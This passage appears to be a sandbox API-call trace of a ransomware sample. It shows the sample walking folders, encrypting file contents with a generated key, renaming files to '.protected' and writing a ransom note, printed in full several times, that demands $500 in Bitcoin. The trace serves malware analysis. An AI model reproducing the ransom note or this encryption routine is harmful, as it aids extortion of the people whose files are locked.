dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.585] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0093.586] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.586] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0093.586] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0093.586] CloseHandle (hObject=0x154) returned 1 [0093.586] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected") returned 138 [0093.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.protected")) returned 1 [0093.587] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: 
lpFindFileData=0x295e560) returned 0 [0093.587] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0093.587] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt") returned 119 [0093.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.588] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.588] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0093.588] lstrlenA (lpString="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") returned 684 [0093.589] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0093.589] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.589] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.589] CloseHandle (hObject=0x150) returned 1 [0093.596] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.596] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.596] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt") returned 108 [0093.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.597] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.597] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.597] lstrlenA (lpString="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") returned 684 [0093.597] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.598] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.598] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.598] CloseHandle (hObject=0x14c) returned 1 [0093.598] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.599] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.599] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt") returned 68 [0093.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.599] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.599] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.602] lstrlenA (lpString="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") returned 684 [0093.603] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.603] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.603] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.603] CloseHandle (hObject=0xd8) returned 1 [0093.603] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="Windows") returned -1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files") returned -1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files (x86)") returned -1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="$Recycle.bin") returned 1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="System Volume Information") returned -1 [0093.603] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache") returned 56 [0093.603] lstrcmpW (lpString1="Feeds Cache", lpString2=".") returned 1 [0093.603] lstrcmpW (lpString1="Feeds Cache", lpString2="..") returned 1 [0093.603] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned 58 [0093.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.609] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.609] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.609] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.609] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.609] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.609] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\.") returned 58 [0093.609] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.609] StrStrIW (lpFirst=".", lpSrch=".protected") 
returned 0x0 [0093.609] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.610] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.610] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.610] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.610] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.610] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\..") returned 59 [0093.610] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.610] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.610] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.610] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Windows") returned -1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files") returned -1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files (x86)") returned -1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="$Recycle.bin") returned 1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="System Volume Information") returned -1 [0093.610] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 65 [0093.610] lstrcmpW (lpString1="1NBUR4HR", lpString2=".") returned 1 [0093.610] lstrcmpW (lpString1="1NBUR4HR", lpString2="..") returned 1 [0093.610] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*") returned 67 [0093.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.611] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.611] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.611] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.611] lstrcmpiW (lpString1=".", lpString2="System 
Volume Information") returned -1 [0093.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.") returned 67 [0093.611] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.611] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.611] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.611] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.611] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.611] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.611] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\..") returned 68 [0093.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.611] StrStrIW (lpFirst="..", lpSrch=".protected") 
returned 0x0 [0093.611] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.611] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.611] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.611] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) 
returned 1 [0093.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.612] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.612] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.612] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.612] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.612] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.612] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.613] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.613] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.613] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, 
lpOverlapped=0x0) returned 1 [0093.613] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.614] CloseHandle (hObject=0x150) returned 1 [0093.614] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected") returned 87 [0093.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.protected")) returned 1 [0093.618] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.618] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.618] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.618] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0093.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) 
